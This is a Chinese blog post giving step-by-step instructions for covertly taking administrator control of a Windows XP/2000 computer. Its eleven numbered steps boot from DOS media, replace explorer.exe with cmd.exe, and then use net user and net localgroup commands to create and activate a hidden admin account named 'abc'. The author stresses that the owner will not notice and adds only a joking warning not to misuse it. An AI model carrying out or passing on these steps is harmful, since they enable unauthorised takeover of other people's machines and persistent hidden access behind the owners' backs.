这个技术其实已经早就出来了，为了方便自己记忆，所以把这个技术写在日志上方便自己以后使用。

   要想使别人感觉不出来的你操作，而你又不会改动别人的任何设置，特别是密码等，在不知道一切的情况下，这种方法最为实用，但不要拿去做坏事哈！

   首先，你应该准备一张引导光盘，当然软盘或者其它的启动介质都可以，系统自带有DOS系统也行。

   有了这样一个先决条件后我们便开始操作了：

   1、利用介质启动电脑，进入DOS系统，然后再进入他系统所在的分区，这里用C表示，一般系统都会装在C区上面，当然如果是NTFS格式的话，可能还需要使用一个NTFSDOS工具令你可以在DOS下查看NTFS分区。

   2、输入命令“C：”（C：为系统盘）回车，转入C盘。

   3、再输入命令“cd windows”（此命令为进入系统目录，2000为WINNT）。

   4、再输入命令“copy explorer.exe bak.exe”（此命令将explorer.exe文件备份，防止系统文件错误，此文件为windows系统的桌面文件）。

   5、再输入命令“copy system32\cmd.exe explorer.exe /y”（此命令为将SYSTEM32下面的CMD.exe拷贝到当前目录下面，且名为explorer.exe，/Y参数为确认覆盖）。

   6、重新启动计算机，进入windows xp。

   7、此时大家都可以看到一个背景，但是没有桌面的图标，只有一个CMD窗口。此时我们就要在此窗口中进行我们的提权操作了，且此时我们拥有超级用户的权限。

   8、输入命令“net user abc /add”（此命令为2000以上的系统才有，意思是为当前系统添加ABC用户）。

   9、输入命令“net user abc /active:yes”（此命令为激活ABC用户）

   10、输入命令“net localgroup administrators abc /add”（此命令为将ABC用户添加进管理员组，即ABC用户此时便拥有管理员权限）。

   11、关闭CMD的窗口，此时桌面一片空白，按一下热启动键（Ctrl+Alt+Del）组合键，弹出任务管理器，在“文件”菜单中选择“运行新任务”，在弹出的对话框中选择“浏览”出现浏览对话框，依次打开“我的电脑”-“C盘”-“windows”，在这里面找到“explorer.exe”文件将其删除（条件是先关闭MS—DOS窗口，不然会弹出文件正在使用的错误），然后等十几秒钟后，便可以再次找到这个文件，双击再点确定即可打开桌面，同时提权也成功了，如果你不想这样麻烦，在完成等十步后，再将C:\windows\explorer.exe文件删除后直接重新启动电脑，就可以直接从ABC用户登陆了，且具有管理员权限。

   以上操作经本人多次试验成功，希望可以帮助到需要它的人。

另外补充，如果在已经登陆系统的情况下，无论你是否知道这台机器的任一密码，或者一点也不知情，只要已经登陆你便可以通过系统脚本来实现系统提权，此方法更为简单，只需要几条命令和重新启动机器一次便搞定。